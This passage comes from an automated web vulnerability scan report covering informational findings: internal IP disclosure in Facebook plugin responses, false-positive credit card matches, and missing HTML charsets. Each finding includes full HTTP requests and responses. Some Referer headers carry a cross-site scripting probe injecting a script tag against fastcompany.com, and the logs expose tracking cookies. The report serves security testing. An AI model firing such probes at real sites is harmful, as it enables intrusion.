<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.31. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.12.35
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:17 GMT
Content-Length: 13173

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.32. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.180.37
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:25 GMT
Content-Length: 13240

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.33. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.140.49
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:28 GMT
Content-Length: 13255

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.34. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.21.37
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:23 GMT
Content-Length: 12833

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.35. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpopsci&width=347&colorscheme=light&show_faces=true&stream=false&header=false&height=250 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.35.105
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:50 GMT
Content-Length: 13693

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.36. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.37.115
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:16 GMT
Content-Length: 12854

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.37. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.137.46
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:39 GMT
Content-Length: 12925

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

15. Credit card numbers disclosed
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


15.1. http://assets.newsinc.com/flash/widget_toppicks01ps2.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets.newsinc.com
Path:   /flash/widget_toppicks01ps2.xml

Issue detail

The following credit card number was disclosed in the response:

Request

GET /flash/widget_toppicks01ps2.xml?v=2.7.0 HTTP/1.1
Host: assets.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
x-amz-id-2: oaLS8PC61eD+cFz4bkDLEWAzU//iDNxltZtogqFJFVZKrsXjRjN9HPSjkPz0hO6V
x-amz-request-id: 3B7490D32CC4D063
Date: Mon, 12 Sep 2011 12:49:33 GMT
Cache-Control: max-age=0
Last-Modified: Fri, 20 May 2011 20:02:04 GMT
ETag: "d4fc97c509659b75278236329237887d"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 6957
Server: AmazonS3

<?xml version="1.0"?>
<gui_info>
   <resources>
       <guifile file="widget_hothmb_gui01.swf"/>
       <cssfile file="internal">
           <!--file="internal" & add internalcss element and insert CDATA css-->
           <inter
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...

15.2. http://www.digitaldollhouse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The following credit card number was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<img src="http://www.digitaldollhouse.com/sites/all/files/imagecache/snapshot_winner_340/snapshot-bin/472870-1315776274.jpg" alt="My Snapshot" title="My Snapshot" class="imagecache imagecache-snapshot_winner_340" width="340" height="195" />
...[SNIP]...

16. HTML does not specify charset
There are 16 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


16.1. http://67.23.1.124/omni/cdcc_mandelbrot_min_2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://67.23.1.124
Path:   /omni/cdcc_mandelbrot_min_2.html

Request

GET /omni/cdcc_mandelbrot_min_2.html HTTP/1.1
Host: 67.23.1.124
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:46:36 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Wed, 29 Jun 2011 17:40:08 GMT
ETag: "500dcb-1d0-4a6dd4685ce00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 464
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mandelbrot Cross-Dom
...[SNIP]...

16.2. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...

16.3. http://ad.yieldmanager.com/rw

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Request

GET /rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 782
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" framebord
...[SNIP]...

16.4. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

16.5. http://amch.questionmarket.com/adsc/d907755/101/908678/adscout.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d907755/101/908678/adscout.php

Request

GET /adsc/d907755/101/908678/adscout.php?ord=4246944 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:06:12 GMT
Server: Apache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 1
Content-Type: text/html

;

16.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2685991&PluID=0&w=336&h=150&ord=1837674&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/p%3B241151714%3B0-0%3B0%3B42089989%3B18754-336/150%3B42232212/42249999/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 12 Sep 2011 12:48:05 GMT
Connection: close
Content-Length: 2070

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

